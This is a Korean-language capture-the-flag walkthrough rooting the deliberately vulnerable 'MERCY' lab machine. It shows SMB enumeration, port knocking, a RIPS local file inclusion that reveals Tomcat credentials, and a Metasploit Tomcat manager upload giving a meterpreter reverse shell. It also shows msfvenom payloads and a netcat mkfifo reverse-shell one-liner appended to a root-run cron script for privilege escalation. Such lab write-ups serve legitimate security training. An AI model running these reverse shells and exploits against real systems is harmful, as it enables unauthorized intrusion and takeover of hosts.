

takudaddy 2021. 3. 19. 13:35














1. Enumeration



1-1) Port Scanning


: tomcat7




1-2) Web Enumeration

Nikto / Dirb / Wfuzz


: robots.txt





1-3) Founded Info through scanning process



base64)로 보임



https://www.base64decode.org/ 에서 디코딩 :

It's annoying, but we repeat this over and over again: cyber hygiene is extremely important. Please stop setting silly passwords that will get cracked with any decent password list.

Once, we found the password "password", quite literally sticking on a post-it in front of an employee's desk! As silly as it may be, the employee pleaded for mercy when we threatened to fire her.

No fluffy bunnies for those who set insecure passwords and endanger the enterprise.



password : password





1-4) finding userlist

[root@takudaddy /script]# enum4linux -a
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Mar 18 11:43:19 2021

|    Target Information    |
Target ...........
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

|    Enumerating Workgroup/Domain on    |
[+] Got domain/workgroup name: WORKGROUP

|    Users on    |
index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: pleadformercy    Name: QIU       Desc: 
index: 0x2 RID: 0x3e9 acb: 0x00000010 Account: qiu      Name:   Desc: 

user:[pleadformercy] rid:[0x3e8]
user:[qiu] rid:[0x3e9]

|    Share Enumeration on    |

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        qiu             Disk      
        IPC$            IPC       IPC Service (MERCY server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\pleadformercy (Local User)
S-1-22-1-1001 Unix User\qiu (Local User)
S-1-22-1-1002 Unix User\thisisasuperduperlonguser (Local User)
S-1-22-1-1003 Unix User\fluffy (Local User)



usernames :










2. Penetration



[선수지식] SMB 취약점 :

TCP 포트 445번으로 실행되는 SMB 서버의 버퍼 오버 플로 때문에 발생하는 취약점이다.

윈도10 과 윈도 서버의 1903·1909 버전에서 작동한다.

취약점과 연관된 SMB는 파일 공유, 네트워크 탐색, 인쇄, 프로세스 간 통신을 가능케 하는 네트워크 프로토콜이다. 공격자가 이 취약점을 활용하려면 SMBv3 서버를 구성하고, 공격 대상이 이 서버에 연결하도록 유도해야 한다. SMBv3의 허점을 이용해 공격자는 조작된 패킷을 SMBv3 서버로 전송할 수 있다. 결과적으로 해커는 원격으로 시스템의 제어 권한을 획득할 수 있게 된다.



2-1) smbclients로 로그인

[root@takudaddy /script]# smbclient \\\\\\qiu -U pleadformercy
Enter WORKGROUP\pleadformercy's password: 
session setup failed: NT_STATUS_LOGON_FAILURE
[root@takudaddy /script]# smbclient \\\\\\qiu -U thisisasuperduperlonguser
Enter WORKGROUP\thisisasuperduperlonguser's password: 
tree connect failed: NT_STATUS_ACCESS_DENIED
[root@takudaddy /script]# smbclient \\\\\\qiu -U fluffy
Enter WORKGROUP\fluffy's password: 
tree connect failed: NT_STATUS_ACCESS_DENIED
[root@takudaddy /script]# smbclient \\\\\\qiu -U qiu
Enter WORKGROUP\qiu's password: 
Try "help" to get a list of possible commands.
smb: \> 

[root@takudaddy /script]# smbclient // -U qiu
Enter WORKGROUP\qiu's password: 
Try "help" to get a list of possible commands.
smb: \> 


2-2) 사용 가능한 명령어 확인 및 정보 다운

smb: \> ls
  .                                   D        0  Sat Sep  1 04:07:00 2018
  ..                                  D        0  Tue Nov 20 01:59:09 2018
  .bashrc                             H     3637  Sun Aug 26 22:19:34 2018
  .public                            DH        0  Sun Aug 26 23:23:24 2018
  .bash_history                       H      163  Sat Sep  1 04:11:34 2018
  .cache                             DH        0  Sat Sep  1 03:22:05 2018
  .private                           DH        0  Mon Aug 27 01:35:34 2018
  .bash_logout                        H      220  Sun Aug 26 22:19:34 2018
  .profile                            H      675  Sun Aug 26 22:19:34 2018

                19213004 blocks of size 1024. 16302072 blocks available
smb: \> cd .private
smb: \.private\> ls
  .                                   D        0  Mon Aug 27 01:35:34 2018
  ..                                  D        0  Sat Sep  1 04:07:00 2018
  opensesame                          D        0  Fri Aug 31 01:36:50 2018
  readme.txt                          N       94  Sun Aug 26 23:22:35 2018
  secrets                             D        0  Tue Nov 20 02:01:09 2018

                19213004 blocks of size 1024. 16302072 blocks available
smb: \.private\> get readme.txt
getting file \.private\readme.txt of size 94 as readme.txt (91.8 KiloBytes/sec) (average 91.8 KiloBytes/sec)
smb: \.private\> cd secrets\
smb: \.private\secrets\> ls
  .                                   D        0  Tue Nov 20 02:01:09 2018
  ..                                  D        0  Mon Aug 27 01:35:34 2018

                19213004 blocks of size 1024. 16302072 blocks available
smb: \.private\secrets\> cd ..
smb: \.private\> cd opensesame\
smb: \.private\opensesame\> ls
  .                                   D        0  Fri Aug 31 01:36:50 2018
  ..                                  D        0  Mon Aug 27 01:35:34 2018
  configprint                         A      539  Fri Aug 31 01:39:14 2018
  config                              N    17543  Sat Sep  1 04:11:56 2018

                19213004 blocks of size 1024. 16302072 blocks available
smb: \.private\opensesame\> get config*
NT_STATUS_OBJECT_NAME_INVALID opening remote file \.private\opensesame\config*
smb: \.private\opensesame\> get config
getting file \.private\opensesame\config of size 17543 as config (17130.2 KiloBytes/sec) (average 8611.8 KiloBytes/sec)
smb: \.private\opensesame\> get configprint
getting file \.private\opensesame\configprint of size 539 as configprint (526.3 KiloBytes/sec) (average 5916.7 KiloBytes/sec)
smb: \.private\opensesame\> cd
Current directory is \.private\opensesame\
smb: \.private\opensesame\> cd ..
smb: \.private\> cd ..
smb: \> ls
  .                                   D        0  Sat Sep  1 04:07:00 2018
  ..                                  D        0  Tue Nov 20 01:59:09 2018
  .bashrc                             H     3637  Sun Aug 26 22:19:34 2018
  .public                            DH        0  Sun Aug 26 23:23:24 2018
  .bash_history                       H      163  Sat Sep  1 04:11:34 2018
  .cache                             DH        0  Sat Sep  1 03:22:05 2018
  .private                           DH        0  Mon Aug 27 01:35:34 2018
  .bash_logout                        H      220  Sun Aug 26 22:19:34 2018
  .profile                            H      675  Sun Aug 26 22:19:34 2018

                19213004 blocks of size 1024. 16302068 blocks available
smb: \> get bash_history
NT_STATUS_OBJECT_NAME_NOT_FOUND opening remote file \bash_history
smb: \> get .bash_history
getting file \.bash_history of size 163 as .bash_history (159.2 KiloBytes/sec) (average 4477.3 KiloBytes/sec)
smb: \> 
smb: \> 
smb: \> 
smb: \> exit



2-3) 내려받은 정보 확인

[root@takudaddy /script]# cat config
Here are settings for your perusal.

Port Knocking Daemon Configuration


        sequence    = 159,27391,4
        seq_timeout = 100
        command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 80 -j ACCEPT
        tcpflags    = syn

        sequence    = 4,27391,159
        seq_timeout = 100
        command     = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 80 -j ACCEPT
        tcpflags    = syn

        sequence    = 17301,28504,9999
        seq_timeout = 100
        command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
        tcpflags    = syn




2-4) knocking으로 포트 열기

[root@takudaddy /script]# knock 159 27391 4
[root@takudaddy /script]# knock 17301 28504 9999
[root@takudaddy /script]# 
[root@takudaddy /script]# nmap
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-18 13:42 KST
Nmap scan report for
Host is up (0.00018s latency).
Not shown: 990 closed ports
22/tcp   open  ssh
53/tcp   open  domain
80/tcp   open  http
110/tcp  open  pop3
139/tcp  open  netbios-ssn
143/tcp  open  imap
445/tcp  open  microsoft-ds
993/tcp  open  imaps
995/tcp  open  pop3s
8080/tcp open  http-proxy
MAC Address: 08:00:27:B1:A5:A4 (Oracle VirtualBox virtual NIC)



2-5) 접속 확인



2-6) 80 포트 스캔

[root@takudaddy /script]# ./webenum.sh

               Web Enumertation tool                   
                                        by takudaddy                         

[ Running ] Nikto against
- Nikto v2.1.6
+ Target IP:
+ Target Hostname:
+ Target Port:        80
+ Start Time:         2021-03-18 13:51:35 (GMT9)
+ Server: Apache/2.4.7 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-3268: /mercy/: Directory indexing found.
+ Entry '/mercy/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.25
+ Cookie stylesheet created without the httponly flag
+ Entry '/nomercy/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Server may leak inodes via ETags, header found with file /, inode: 5a, size: 5745661f170dc, mtime: gzip
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST 
2-+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.html: Admin login page/section found.
+ 7917 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time:           2021-03-18 13:52:19 (GMT9) (44 seconds)
+ 1 host(s) tested

[ Running ] Dirb against

DIRB v2.22    
By The Dark Raver

START_TIME: Thu Mar 18 13:52:19 2021
WORDLIST_FILES: /usr/share/wordlists/dirb/common.txt


GENERATED WORDS: 4612                                                          

---- Scanning URL: ----
+ (CODE:200|SIZE:90)                                                               
+ (CODE:200|SIZE:50)                                                               
+ (CODE:403|SIZE:292)                                                           
+ (CODE:200|SIZE:79)                                                                     
END_TIME: Thu Mar 18 13:52:20 2021




2-7) digging




RIPS 0.53?


[root@takudaddy /]# searchsploit rips 0.53
---------------------------------------------- ---------------------------------
 Exploit Title                                |  Path
---------------------------------------------- ---------------------------------
RIPS 0.53 - Multiple Local File Inclusions    | php/webapps/18660.txt
---------------------------------------------- ---------------------------------

[root@takudaddy /mercy]# searchsploit -m php/webapps/18660.txt
  Exploit: RIPS 0.53 - Multiple Local File Inclusions
      URL: https://www.exploit-db.com/exploits/18660
     Path: /usr/share/exploitdb/exploits/php/webapps/18660.txt
File Type: ASCII text, with CRLF line terminators

Copied to: /mercy/18660.txt

[root@takudaddy /mercy]# 
[root@takudaddy /mercy]# cat 18660.txt 
# RIPS <= 0.53 Multiple Local File Inclusion Vulnerabilities
# Google Dork: allintitle: "RIPS - A static source code analyser for
vulnerabilities in PHP scripts"
# Althout this script is not intended to be accesible from internet, there
are some websites that host it.
# Download: http://sourceforge.net/projects/rips-scanner/
# Date: 23/03/12
# Contact: mattdch0@gmail.com
# Follow: @mattdch
# www.localh0t.com.ar

File: /windows/code.php

102: file $lines = file($file);
    96: $file = $_GET['file'];


File: /windows/function.php

    64: file $lines = file($file);
        58: $file = $_GET['file'];

read the first line of the file)[root@takudaddy /mercy]# 


LFI가 가능하다.


url 뒤에


추가하면 된단다.






2-8) 톰캣 관련 파일 경로를 찾기


8080 포트로 접속해보면

/etc/tomcat7/tomcat-users.xml에 있단다.


username : passwd

thisisasuperduperlonguser : heartbreakisinevitable

fluffy : freakishfluffybunny




2-9) tomcat login

8080 포트에 들어가면

'관리자' 페이지에 붙을 수 있다.




위에서 찾은 아이디와 비번을 넣으면

관리자로 로그인이 가능하다.


war file을 만들어 올릴 수 있는 것 같다.



또는 파일 생성해 업로드하는 과정 없이

곧장 msfconsole로 붙을 수도 있는 것 같은데



# msfconsole -q

   17  exploit/multi/http/tomcat_mgr_deploy                         2009-11-09       excellent  Yes    Apache Tomcat Manager Application Deployer Authenticated Code Execution
   18  exploit/multi/http/tomcat_mgr_upload                         2009-11-09       excellent  Yes    Apache Tomcat Manager Authenticated Upload Code Execution
   19  exploit/multi/http/zenworks_configuration_management_upload  2015-04-07       excellent  Yes    Novell ZENworks Configuration Management Arbitrary File Upload
   20  exploit/windows/http/cayin_xpost_sql_rce                     2020-06-04       excellent  Yes    Cayin xPost wayfinder_seqid SQLi to RCE
   21  exploit/windows/http/tomcat_cgi_cmdlineargs                  2019-04-10       excellent  Yes    Apache Tomcat CGIServlet enableCmdLineArguments Vulnerability
   22  post/multi/gather/tomcat_gather                                               normal     No     Gather Tomcat Credentials
   23  post/windows/gather/enum_tomcat                                               normal     No     Windows Gather Apache Tomcat Enumeration                                                                                                                     

Interact with a module by name or index. For example info 23, use 23 or use post/windows/gather/enum_tomcat

msf6 > use exploit/multi/http/tomcat_mgr_upload 
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf6 exploit(multi/http/tomcat_mgr_upload) > show options

Module options (exploit/multi/http/tomcat_mgr_upload):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   HttpPassword                   no        The password for the specified username
   HttpUsername                   no        The username to authenticate as
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT         80               yes       The target port (TCP)
   SSL           false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI     /manager         yes       The URI path of the manager app (/html/upload and /undeploy will be used)
   VHOST                          no        HTTP server virtual host

Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Java Universal

msf6 exploit(multi/http/tomcat_mgr_upload) > set HttpPassword heartbreakisinevitable
HttpPassword => heartbreakisinevitable
msf6 exploit(multi/http/tomcat_mgr_upload) > set HttpUsername thisisasuperduperlonguser
HttpUsername => thisisasuperduperlonguser
msf6 exploit(multi/http/tomcat_mgr_upload) > set RHOSTS
msf6 exploit(multi/http/tomcat_mgr_upload) > set RPORT 8080
RPORT => 8080
msf6 exploit(multi/http/tomcat_mgr_upload) > exploit

[*] Started reverse TCP handler on 
[*] Retrieving session ID and CSRF token...
[*] Uploading and deploying noT8p1uinSFv...
[*] Executing noT8p1uinSFv...
[*] Undeploying noT8p1uinSFv ...
[*] Sending stage (58086 bytes) to
[*] Meterpreter session 1 opened ( -> at 2021-03-19 11:31:28 +0900

meterpreter > shell
Process 1 created.
Channel 1 created.
uid=116(tomcat7) gid=126(tomcat7) groups=126(tomcat7)
python -0^Hc ^H^H^H
Unknown option: -0
usage: python [option] ... [-c cmd | -m mod | file | -] [arg] ...
Try `python -h' for more information.
python -c 'import pty;pty.spawn("/bin/bash")'


정상적으로 접속되었다.




2-10) 그래도 페이로드를 생성해

파일을 업로드한 뒤 리스너로 연결하는

연습도 해보자



payload 생성 및 nc로 리슨 상태 대기

# msfvenom -p java/meterpreter/reverse_shell LHOST= LPORT=7979 -f war > attack.war

# nc -lvp 7979




2-11) 파일 업로드




2-12) 리스너 기동 후 연결


파일 클릭하면 연결됨 (불안정하다)




복잡한 방법

# msfconsole -q

> use exploit/multi/handler

> set payload java/meterpreter/reverse_tcp

> set LHOST

> set LPORT 7979

> exploit


올린 파일 클릭하면 연결됨







3. Privilege escalation


$ cd /

$ ls -al



위에서 얻은 fluffy 유저로 전환해본다.








정보 찾기

fluffy@MERCY:/home$ cd fluffy
cd fluffy
fluffy@MERCY:~$ ls
fluffy@MERCY:~$ ls -al
ls -al
total 16
drwxr-x--- 3 fluffy fluffy 4096 Nov 20  2018 .
drwxr-xr-x 6 root   root   4096 Nov 20  2018 ..
-rw------- 1 fluffy fluffy   12 Nov 20  2018 .bash_history
drwxr-xr-x 3 fluffy fluffy 4096 Nov 20  2018 .private
fluffy@MERCY:~$ cat .bash_history
cat .bash_history
cd ../
fluffy@MERCY:~$ cd .private
cd .private
fluffy@MERCY:~/.private$ ls
fluffy@MERCY:~/.private$ cd secrets
cd secrets
fluffy@MERCY:~/.private/secrets$ ls -al
ls -al
total 20
drwxr-xr-x 2 fluffy fluffy 4096 Nov 20  2018 .
drwxr-xr-x 3 fluffy fluffy 4096 Nov 20  2018 ..
-rwxr-xr-x 1 fluffy fluffy   37 Nov 20  2018 backup.save
-rw-r--r-- 1 fluffy fluffy   12 Nov 20  2018 .secrets
-rwxrwxrwx 1 root   root    222 Nov 20  2018 timeclock

fluffy@MERCY:~/.private/secrets$ cat backup.save
cat backup.save

echo Backing Up Files;

fluffy@MERCY:~/.private/secrets$ cat timeclock
cat timeclock

echo "The system time is: $now." > ../../../../../var/www/html/time
echo "Time check courtesy of LINUX" >> ../../../../../var/www/html/time
chown www-data:www-data ../../../../../var/www/html/time


root 권한으로 돌아가는 timeclock 프로그램,

권한 상승을 위한 스크립트를 timeclock에

추가해 넣고 일정 시간이 지나면 기동되는 것 같다.




* fifo payload 만들기

[root@takudaddy ~]# msfvenom -p cmd/unix/reverse_netcat LHOST= LPORT=7979
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 102 bytes
mkfifo /tmp/rbpwxzv; nc 7979 0</tmp/rbpwxzv | /bin/sh >/tmp/rbpwxzv 2>&1; rm /tmp/rbpwxzv



payload가 생성된 후 하단에

침투 서버에 입력해야 할

커맨드가 나온다.



이걸 수정하지 않은 상태로

그대로 복사해 붙여 넣는다.




"mkfifo /tmp/rbpwxzv; nc 7979 0</tmp/rbpwxzv | /bin/sh >/tmp/rbpwxzv 2>&1; rm /tmp/rbpwxzv" >> timeclock




마지막으로 공격 서버에서

리스너를 열어주고 대기하면

조금 시간이 지난 후 자동 접속된다.



[root@takudaddy ~]# msfvenom -p cmd/unix/reverse_netcat LHOST= LPORT=7979
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 102 bytes
mkfifo /tmp/rbpwxzv; nc 7979 0</tmp/rbpwxzv | /bin/sh >/tmp/rbpwxzv 2>&1; rm /tmp/rbpwxzv
[root@takudaddy ~]# nc -lvp 7979
Listening on 7979
Connection received on 41858
uid=0(root) gid=0(root) groups=0(root)
python -c 'import pty;pty.spawn("/bin/bash")'

root@MERCY:~# ls
author-secret.txt  config  proof.txt
root@MERCY:~# cat author-secret.txt
cat author-secret.txt
Hi! Congratulations on being able to root MERCY.

The author feels bittersweet about this box. On one hand, it was a box designed as a dedication to the sufferance put through by the Offensive Security team for PWK. I thought I would pay it forward by creating a vulnerable machine too. This is not meant to be a particularly difficult machine, but is meant to bring you through a good number of enumerative steps through a variety of techniques.

The author would also like to thank a great friend who he always teases as "plead for mercy". She has been awesome. The author, in particular, appreciates her great heart, candour, and her willingness to listen to the author's rants and troubles. The author will stay forever grateful for her presence. She never needed to be this friendly to the author.

The author, as "plead for mercy" knows, is terrible at any sort of dedication or gifting, and so the best the author could do, I guess, is a little present, which explains the hostname of this box. (You might also have been pleading for mercy trying to root this box, considering its design.)

You'll always be remembered, "plead for mercy", and Offensive Security, for making me plead for mercy!

Congratulations, once again, for you TRIED HARDER!

The Author




